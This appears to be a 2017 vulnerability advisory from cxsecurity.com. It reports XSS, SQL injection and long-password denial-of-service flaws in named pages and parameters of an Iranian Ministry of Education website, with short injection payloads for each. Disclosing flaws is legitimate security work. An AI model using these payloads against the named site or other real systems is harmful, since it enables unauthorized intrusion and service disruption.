Iran's Sensing Center, Ministry of Education XSS / SQLi / DoS /CSRF

2017.06.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Vulnerability Title: Iran's Sensing Center, Ministry of Education High level vulns # Date: 2017-06-20 # Exploit Author: Infinity Security Team # Google Dork: [-] # Vendor Homepage: http://www.medu.ir # Tested on: Windows 7 (applicable to all Windows platforms) # I show you how deep the rabbit-hole goes. "Morpheus" -------------------------- 1.Cross Site Scripting (XSS): [+] http://aee.medu.ir/IranEduThms/theme2/cntntpge.php - "rcid" (GET input) parameter most set to: - 67" onmouseover=prompt(916009) bad=" - or - 67" onmouseover=prompt(948428) bad=" 2. Long Password Denial of Service: =>the atacker may cause the website to become temporarily/indefinitely unavailable or unresponsive. [+] http://aee.medu.ir/IranEdu/edu_usrlgnchck.php - Vulnerable password input: "pass11" - test +1000000 characters. 3.SQL injection: [+] http://aee.medu.ir/IranEdu/edu_getofferview.php > "cfnam" parameter was set to "\" "cmail" parameter was set to "\" "ctext" parameter was set to "\" [+] http://aee.medu.ir/IranEdu/edu_newstoprnt.php > "rcid" parameter was set to "1'"" [+] http://aee.medu.ir/IranEdu/edu_sndtofrnd.php > "rcid" parameter was set to "1'"" [+] http://aee.medu.ir/IranEduThms/theme2/cntntpge.php > "rcid" parameter was set to "1'"" - all GET input -------------------------- # Discovered By: Root_Killer(https://t.me/root_killer) # https://t.me/InfinitySec # Root_Killer, Ehsan Korn # @InfinitySec, @root_killer, @pohzeyshen


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top